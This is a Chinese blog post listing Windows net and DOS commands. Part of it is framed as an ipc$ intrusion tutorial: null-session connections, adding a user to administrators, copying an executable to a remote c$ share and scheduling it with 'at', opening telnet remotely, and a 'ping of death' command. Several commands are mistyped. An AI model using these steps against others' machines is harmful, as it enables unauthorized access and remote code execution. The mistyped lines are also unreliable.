dos小命令

 net user (查看所有网络用户)
net user nike 123 /add(添加一个叫nike 的用户 密码为123)
net user nike (查看用户 nike 的状态)
net user nike 123456 /add (更改用户密码为123456)
net user nike /delete (删除nike 用户)
net localgroup administrator nike /add (把用户nike 的权限提升为管理员)
net password 密码 更改系统登陆密码

nslookup www.xxxx.com (查看网站的信息 比 ping 命令还要详细)
ping www.xxxx.com (查看网站的IP)
Ipconfig /all (查看本机IP的命令)
telnet 192.168.x.xx (远程登陆某主机的命令)
net user guest /active:yes 激活guest用户
net start 服务 名  开启 服务 ;(如:net start telnet, net start schedule)
net stop 服务 名 停止某 服务
net time //目标ip 查看对方时间
net time //目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view [url=file://ip/]file://ip/[/url] 查看对方局域网内开启了哪些共享
net config 显示系统 网络 设置
net logoff 断开连接的共享
net pause 服务 名 暂停某 服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的 网络 连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net share ipc$ /del
关闭目标的ipc$共享 ;如果你要给它开共享 文件夹,你可以用:
net share xinxin=c:/
这样就把它的c盘开为共享 名为xinxin共享 文件夹了。(可是我发现很多人错误的认为开共享 文件夹的命令 是net share c$,还大模大样的给菜鸟指指点点,真是误人子弟了)。再次声明,这些操作都是在shell下才能实现的。

十一 一些需要shell才能完成的命令
看到很多教程这方面写的十分不准确,一些需要shell才能完成命令 就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令
1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;
2 打开远程主机的ipc$共享 ,默认共享 ,普通共享 的操作需要在shell下完成;
3 运行/关闭远程主机的服务,需要在shell下完成;
4 启动/杀掉远程主机的进程,也需要在shell下完成(用软件的情况下除外,如pskill)。
十二 入侵中可能会用到的命令
为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令 ,如果你已经掌握了这些命令 ,你可以跳过这一部分看下面的内容。请注意这些命令 是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能向远程主机执行。  

1 建立/删除ipc$连接的命令
1)建立空连接:
net use //127.0.0.1/ipc$ "" /user:""  
2)建立非空连接:
net use //127.0.0.1/ipc$ "密码" /user:"用户名"  
3)删除连接:
net use //127.0.0.1/ipc$ /del

2 在ipc$连接中对远程主机的操作命令
1) 查看远程主机的共享 资源(看不到默认共享 ):
net view //127.0.0.1  
2) 查看远程主机的当前时间:
net time //127.0.0.1  
3) 得到远程主机的netbios用户名列表:
nbtstat -A 127.0.0.1  
4)映射/删除远程共享 :
net use z: //127.0.0.1/c  
此命令 将共享 名为c的共享 资源映射为本地z盘  
net use z: /del  
删除映射的z盘,其他盘类推
5)向远程主机复制文件:
copy 路径/文件名 //IP/共享 目录名,如:
copy c:/xinxin.exe //127.0.0.1/c$ 即将c盘下的xinxin.exe复制到对方c盘内


当然,你也可以把远程主机上的文件复制到自己的机器里:
copy //127.0.0.1/c$/xinxin.exe c:/
6)远程添加计划任务:
at //IP 时间 程序名 如:
at //127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径

3 本地命令
1)查看本地主机的共享 资源(可以看到本地的默认共享
net share
2)得到本地主机的用户列表
net user
3)显示本地某用户的帐户信息
net user 帐户名
4)显示本地主机当前启动的服务
net start  
5)启动/关闭本地服务
net start 服务名  
net stop 服务名  
6)激活禁用的用户
net uesr 帐户名 /active:yes
很显然的是,虽然这些都是本地命令 ,但如果你在远程主机的shell中输入,比如你telnet成功后输入上面这些命令 ,那么这些本地输入将作用在远程主机上。

4 其他一些命令
1)telnet  
telnet IP 端口
telnet 127.0.0.0 23
2)用opentelnet.exe开启远程主机的telnet
OpenTelnet.exe //ip 管理员帐号 密码 NTLM的认证方式 port
OpenTelnet.exe //127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就可以更改ntlm认证
4)对仅WIN2K/XP有效
3)用psexec.exe一步获得shell,需要ipc管道支持 psex
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的 网络 连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由( 数据 包),参数:“-w数字”用于设置超时间隔。
ping ip(或 域名 ) 向对方主机发送默认大小为32字节的 数据 ,参数:“-l[空格] 数据 包大小”;“-n发送 数据 次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值